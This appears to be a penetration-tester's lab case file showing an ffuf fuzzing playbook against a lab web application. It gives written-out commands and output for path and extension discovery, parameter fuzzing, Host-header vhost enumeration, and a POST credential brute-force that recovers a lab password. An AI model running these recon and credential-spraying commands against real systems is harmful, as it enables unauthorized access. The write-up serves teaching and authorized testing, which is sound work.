Web content and parameter fuzzing with ffuf
Operator methodology for ffuf: directory and extension discovery, response filtering, GET/POST parameter and credential fuzzing, and Host-header vhost enumeration with noise reduction.
- Case files
- Web content and parameter fuzzing with ffuf
This case documents our standard web fuzzing playbook with ffuf against a lab application at 10.10.130.176 — discovery, filtering, parameter abuse, and credential spraying patterns we reuse on client assessments.
Baseline FUZZ against raft/big lists; extension fuzz found index.php and about.php.
Use -fc 403, -mc 200, -fs 0, and -fr to keep actionable hits.
burp-parameter-names discovered id=. Numeric STDIN fuzz found valid IDs. POST uname/passwd spray recovered Dummy / p@ssword.
Host-header vhost fuzz and -x / -replay-proxy for Burp integration.
Engagement summary
This case documents our standard web fuzzing playbook with ffuf against a lab application at 10.10.130.176 — discovery, filtering, parameter abuse, and credential spraying patterns we reuse on client assessments.
ffuf is our default HTTP fuzzer for content discovery and parameter testing. We calibrate wordlists from SecLists, reduce noise with -fc/-mc/-fs/-fw/-fr, and escalate from path discovery into parameter names, value ranges, and form credentials. The same options apply when we proxy through Burp for manual validation.
Operational note
Always rate-limit and scope fuzzing to authorized targets. Prefer filtered runs that surface 200/302 of interest over unfiltered floods that bury findings.
Content and extension discovery
Baseline FUZZ against raft/big lists; extension fuzz found index.php and about.php.
OPERATOR · FFUF PATHS
savvy@lab:~$ ffuf -u http://10.10.130.176/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt
favicon.ico [Status: 200, Size: 1406]
robots.txt [Status: 200, Size: 26]
about.php [Status: 200, Size: 4840]
login.php [Status: 200, Size: 1523]
setup.php [Status: 200, Size: 4067]
OPERATOR · EXTENSIONS
savvy@lab:~$ ffuf -u http://10.10.130.176/indexFUZZ -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt
index.php [Status: 200]
index.phps [Status: 200]
Noise reduction filters
Use -fc 403, -mc 200, -fs 0, and -fr to keep actionable hits.
OPERATOR · FILTERS
savvy@lab:~$ ffuf -u http://10.10.130.176/FUZZ -w raft-medium-files-lowercase.txt -fc 403
savvy@lab:~$ ffuf -u http://10.10.130.176/config/FUZZ -w raft-medium-files-lowercase.txt -fc 403
config.inc.php [Status: 200, Size: 0]
savvy@lab:~$ ffuf -u http://10.10.130.176/FUZZ -w raft-medium-files-lowercase.txt -fr '/\..*'
Operator tip
-fr preserves interesting 403s (e.g. backup extensions) that a blanket -fc 403 would hide.
Parameter and credential fuzzing
burp-parameter-names discovered id=. Numeric STDIN fuzz found valid IDs. POST uname/passwd spray recovered Dummy / p@ssword.
OPERATOR · PARAM NAMES
savvy@lab:~$ ffuf -u 'http://10.10.130.176/sqli-labs/Less-1/?FUZZ=1' -w burp-parameter-names.txt -fw 39
id [Status: 200]
OPERATOR · VALUE FUZZ
savvy@lab:~$ seq 0 255 | ffuf -u 'http://10.10.130.176/sqli-labs/Less-1/?id=FUZZ' -w - -fw 33
# highest valid id observed: 14
OPERATOR · POST CREDS
savvy@lab:~$ ffuf -u http://10.10.130.176/sqli-labs/Less-11/ -X POST -d 'uname=Dummy&passwd=FUZZ&submit=Submit' -w hak5.txt -fs 1435 -H 'Content-Type: application/x-www-form-urlencoded'
p@ssword [Status: 200]
Vhosts and Burp proxying
Host-header vhost fuzz and -x / -replay-proxy for Burp integration.
COMMANDS
ffuf -u http://mydomain.com -w subdomains-top1million-5000.txt \
-H 'Host: FUZZ.mydomain.com' -fs 0
ffuf -u http://10.10.130.176/FUZZ -w common.txt -x http://127.0.0.1:8080
ffuf -u http://10.10.130.176/FUZZ -w common.txt -replay-proxy http://127.0.0.1:8080Remediation (application owners)
Eliminate default/setup endpoints, enforce strong credentials, and monitor for high-rate fuzzing patterns from unauthorized sources.